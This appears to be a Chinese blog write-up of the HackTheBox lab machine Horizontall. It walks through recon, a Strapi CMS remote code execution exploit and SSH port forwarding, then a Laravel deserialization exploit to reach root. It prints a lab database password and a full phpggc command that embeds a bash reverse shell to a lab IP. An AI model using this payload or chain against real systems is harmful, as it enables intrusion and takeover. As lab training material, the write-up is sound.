HackTheBox | Horizontall

Horizontall

nmap扫描,开放22、80,80对应站点http://horizontall.htb

image-20220808083848092

访问80

image-20220808084055211

dirsearch扫描,也没有东西

image-20220808084601072

看wp之后发现在response的js文件里,有一个新的域名,虽然我仍然没找到

image-20220808085949263

修改hosts文件之后访问http://api-prod.horizontall.htb/

image-20220808090150591

找到一个admin路径,访问之后跳转到认证页面,使用了strapiCMS

image-20220808090419973

熟悉的套路就是Google exp,然后就找到了RCE

image-20220808091104100

使用脚本,成功RCE,但是是无回显

image-20220808091652191

直接反弹shell

image-20220808092652645

image-20220808092707362

检查/etc/passwd,看到developer用户

image-20220808092814117

strapi用户可以直接读取developer用户家目录下的user.txt

检查本地,存在MySQL

image-20220808094338813

尝试寻找MySQL数据库登录方式,在/opt/strapi/myapi/config/environments/development下的database.json中找到一堆账号密码developer/#J!:F9Zt2u

image-20220808094557891

但是该密码无法登录developer的ssh,还是从数据库入手。最终在数据库中找到strapi的管理员密码的密文值。

image-20220808095128616

上john爆破也没爆出来

image-20220808104102013

回顾前面的内容,发现本地还开放了13378000。探测这两个端口的服务,发现8000开放Lavarel

image-20220808100450552

写ssh公钥,用于之后的端口转发

本地ssh-keygen生成id_rsa.pub,然后将id_rsa.pub的内容写入strapi家目录下的.ssh/authorized_keys

本地设置ssh端口转发,将10.10.11.105主机上127.0.0.1:8000转发到本地的8000端口

image-20220808103125791

当再去访问本地的8000时,就访问到了10.10.11.105的8000端口上的Laravel服务,版本为v8

image-20220808103230081

Laravel存在CVE,之前的某道题中用到过,所以直接找exp进行利用了

https://github.com/ambionics/laravel-exploits

直接拿到root权限

image-20220808105019784

反弹shell

php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/1234 0>&1'"

image-20220808105710180

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值